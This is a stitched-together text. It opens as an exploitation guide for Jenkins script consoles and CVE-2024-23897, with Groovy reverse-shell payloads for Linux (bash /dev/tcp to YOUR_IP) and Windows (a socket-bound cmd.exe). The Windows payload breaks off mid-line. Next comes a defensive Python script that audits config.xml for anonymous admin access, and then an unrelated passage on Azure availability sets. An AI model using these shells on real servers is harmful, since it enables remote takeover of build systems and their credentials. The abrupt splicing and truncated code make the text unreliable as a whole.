Exploiting Jenkins / CVE-2024-23897

Often the script console is accessible without authentication, due to misconfiguration, at http://JENKINS_IP/script

If you don't have access to the script console and the version is vulnerable to CVE-2024-23897, then exploit it to read files and get authentication credentials for Jenkins (explained below).

Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script.

For Linux,

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

For Windows,

String host="YOUR_IP";
int port=PORT;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
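The misconfiguration mentioned above, seen from the defender's side: this added example (not code from the original post) audits a Jenkins `config.xml` for settings that hand Overall/Administer, and with it the script console, to visitors who are not logged in. The function name and both sample documents are constructed for illustration, and it assumes the standard `useSecurity` and `authorizationStrategy` elements.

```python
import xml.etree.ElementTree as ET

ADMINISTER = "hudson.model.Hudson.Administer"  # Overall/Administer gates /script
UNSECURED = "hudson.security.AuthorizationStrategy$Unsecured"  # "Anyone can do anything"

# Constructed config.xml samples (illustrative, not taken from the post).
# SAMPLE_OPEN mixes the older and newer matrix entry formats on purpose.
SAMPLE_OPEN = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.GlobalMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Read:anonymous</permission>
    <permission>USER:hudson.model.Hudson.Administer:anonymous</permission>
    <permission>USER:hudson.model.Hudson.Administer:alice</permission>
  </authorizationStrategy>
</hudson>"""

SAMPLE_LOCKED = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
</hudson>"""


def script_console_findings(config_xml):
    """Return the settings that let a visitor use /script without logging in."""
    root = ET.fromstring(config_xml)
    findings = []
    # Assumption: only an explicit "false" is flagged; a missing element is not.
    if (root.findtext("useSecurity") or "").strip().lower() == "false":
        findings.append("useSecurity is false: security is disabled")
    strategy = root.find("authorizationStrategy")
    if strategy is None:
        return findings
    if strategy.get("class") == UNSECURED:
        findings.append("authorization strategy is Unsecured")
    for perm in strategy.iter("permission"):
        # Matrix entries are PERMISSION:sid or, in newer formats, TYPE:PERMISSION:sid.
        parts = (perm.text or "").strip().split(":")
        if ADMINISTER in parts[:-1] and parts[-1] == "anonymous":
            findings.append("matrix grants Overall/Administer to anonymous")
    return findings


if __name__ == "__main__":
    for name, xml in (("open", SAMPLE_OPEN), ("locked", SAMPLE_LOCKED)):
        print(name, script_console_findings(xml) or "no anonymous admin path found")
```

An empty result only means none of these three settings is present; plugin-specific authorization strategies need their own review.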
An availability set is a logical grouping of two or more VMs that helps keep an application hosted in the Azure cloud available during planned or unplanned maintenance.

Planned events such as patching security vulnerabilities, improving performance, and adding or updating features are considered planned maintenance, whereas unplanned maintenance covers events such as a hardware failure in the data center, a power outage, or a disk failure. During such events, cloud providers need to ensure that their customers are not affected. In the Azure cloud, one method of achieving this is to use availability sets. VMs that are part of an availability set automatically switch to a working physical server so the VM continues to run.

A group of virtual machines that share common hardware is in the same fault domain. A fault domain is essentially a rack of servers. It provides physical separation of your workload across the different power, cooling, and network hardware that supports the physical servers in the data center server racks. If the hardware that supports a server rack becomes unavailable, only that rack of servers is affected by the outage.

For example, during the monthly patching activity, the VMs are required to reboot. With availability sets, one VM can be rebooted at a time while the other stays up, achieving fault tolerance and zero downtime.